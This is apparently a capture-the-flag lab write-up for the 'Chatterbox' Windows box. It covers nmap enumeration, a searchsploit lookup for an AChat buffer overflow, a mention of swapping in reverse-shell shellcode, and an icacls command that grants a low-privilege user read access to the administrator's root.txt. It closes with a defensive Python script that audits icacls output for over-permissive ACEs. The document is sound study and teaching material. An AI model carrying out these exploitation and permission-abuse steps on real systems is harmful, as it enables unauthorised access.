Chatterbox
OS: Windows, Difficulty: Medium, IP: 10.10.10.74
Initial Enumeration
# Nmap 7.70 scan initiated Mon Jul 29 17:20:46 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 9255,9256 10.10.10.74
Nmap scan report for 10.10.10.74
Host is up (0.40s latency).
PORT STATE SERVICE VERSION
9255/tcp open http AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open achat AChat chat system
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 9256/tcp)
HOP RTT ADDRESS
1 402.86 ms 10.10.14.1
2 404.26 ms 10.10.10.74
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 29 17:21:25 2019 -- 1 IP address (1 host up) scanned in 42.58 seconds
Searchsploit for achat
$ searchsploit achat
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Achat 0.150 beta7 - Remote Buffer Overflow | exploits/windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit) | exploits/windows/remote/36056.rb
MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/32958.txt
Parachat 5.5 - Directory Traversal | exploits/php/webapps/24647.txt
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Metasploit wasn't working for me, so I moved to the manual exploitation script, which launched calculator; however, I changed the shellcode to launch a windows/shell_reverse_tcp shell for my Kali machine.
User Own
C:\Users\Alfred\Desktop>type user.txt
type user.txt
72290***
Root Own
On a little inspection it turns out I can look at the Administrator folder; however, I cannot read the root.txt file from it. This seemed very odd.
Directory of C:\Users\Administrator\Desktop
12/10/2017 07:50 PM <DIR> .
12/10/2017 07:50 PM <DIR> ..
12/10/2017 07:50 PM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 18,162,642,944 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
Access is denied.
I checked the permissions I have on the Desktop folder as well as on the root.txt file, and it turns out I have FULL control of the file and the folder; all I had to do was grant myself the permission to read the root.txt file.
C:\Users\Administrator>icacls Desktop
icacls Desktop
Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
CHATTERBOX\Administrator:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CHATTERBOX\Alfred:(I)(OI)(CI)(F)
C:\Users\Administrator\Desktop>icacls "root.txt" /grant "Alfred":F
icacls "root.txt" /grant "Alfred":F
processed file: root.txt
Successfully processed 1 files; Failed processing 0 files
C:\Users\Administrator\Desktop>type root.txt
type root.txt
a673d***
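The icacls listing above is the whole story: every ACE on Desktop, including Alfred's, carries (I) for inherited and (F) for full control, so a stray ACE on the parent profile folder has propagated down to the administrator's files. As an added example (not code from the original write-up), the Python script below parses the text that icacls prints and flags principals outside a trusted set that hold full control, or the specific WDAC (write DACL) and WO (write owner) rights that let a user rewrite an object's permissions. The sample input is constructed to mirror the Desktop listing, the trusted-principal set is an assumption to adjust per host, and the parser assumes the audited path contains no spaces.

```python
"""Audit icacls output for over-permissive ACEs on sensitive paths.

Added example, not part of the original write-up: it parses the text that
`icacls <path>` prints and reports principals outside a trusted set that
hold Full control (F), or the specific rights WDAC (write DACL) / WO (write
owner) that let a user rewrite a file's permissions. The sample input and
the trusted-principal set are constructed for this example.
"""
import re

# Constructed sample, shaped like the `icacls Desktop` listing in the write-up.
SAMPLE_ICACLS = """Desktop NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(F)
        CHATTERBOX\\Administrator:(I)(OI)(CI)(F)
        BUILTIN\\Administrators:(I)(OI)(CI)(F)
        CHATTERBOX\\Alfred:(I)(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Assumption: on an administrator's profile only these principals should
# hold full control. Adjust to the host being audited.
TRUSTED = {
    "NT AUTHORITY\\SYSTEM",
    "BUILTIN\\Administrators",
    "CHATTERBOX\\Administrator",
}

# Human-readable names for the icacls flag tokens used below.
FLAG_NAMES = {
    "I": "inherited",
    "OI": "object inherit",
    "CI": "container inherit",
    "IO": "inherit only",
    "NP": "no propagate inherit",
    "F": "full control",
    "M": "modify",
    "RX": "read and execute",
    "R": "read",
    "W": "write",
    "D": "delete",
    "N": "no access",
    "DENY": "deny",
}

# One ACE line: "<principal>:(flag)(flag)...". The principal may contain
# spaces (NT AUTHORITY\SYSTEM) but never a colon.
ACE_RE = re.compile(r"^(?P<principal>[^:]+):(?P<flags>(?:\([^)]*\))+)$")


def parse_icacls(text):
    """Return a list of (path, principal, flags) tuples from icacls output.

    The first ACE of each object is printed on the same line as its path;
    the remaining ACEs are indented. Assumption: the path contains no spaces.
    """
    entries = []
    path = None
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("Successfully processed"):
            continue
        line = raw
        if not raw[0].isspace():
            # New object: split the path off the first ACE.
            path, _, line = raw.partition(" ")
        match = ACE_RE.match(line.strip())
        if match is None:
            raise ValueError(f"unrecognised icacls line: {raw!r}")
        flags = re.findall(r"\(([^)]*)\)", match.group("flags"))
        entries.append((path, match.group("principal"), flags))
    return entries


def describe(flags):
    """Expand flag tokens into words, e.g. ['I', 'F'] -> 'inherited, full control'."""
    return ", ".join(FLAG_NAMES.get(flag, flag) for flag in flags)


def find_overpermissive(entries, trusted=TRUSTED):
    """Report untrusted principals that can read everything or rewrite the DACL."""
    findings = []
    for path, principal, flags in entries:
        if principal in trusted or "DENY" in flags:
            continue
        # Specific rights are comma-separated inside one token, e.g. "(RX,WDAC)".
        specific = {right for flag in flags for right in flag.split(",")}
        if "F" in flags or specific & {"WDAC", "WO"}:
            findings.append({
                "path": path,
                "principal": principal,
                "inherited": "I" in flags,
                "rights": describe(flags),
            })
    return findings


if __name__ == "__main__":
    for finding in find_overpermissive(parse_icacls(SAMPLE_ICACLS)):
        origin = "inherited from parent" if finding["inherited"] else "set explicitly"
        print(f"{finding['path']}: {finding['principal']} has {finding['rights']} ({origin})")
```

Run it over a saved listing (`icacls C:\Users\Administrator\Desktop > acl.txt` on the host, then feed the file to `parse_icacls`). On the sample it reports exactly one finding, Alfred's inherited full control, which is what the write-up relies on to grant read access to root.txt. Because the ACE is marked (I), the fix belongs on the parent folder where the entry was added, not on the individual file; removing it there stops it propagating to everything underneath.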
Learning Outcome
Have a look at all the important files first and then determine your strategy; I wasted quite a while without realising that I had FULL access on the required folder.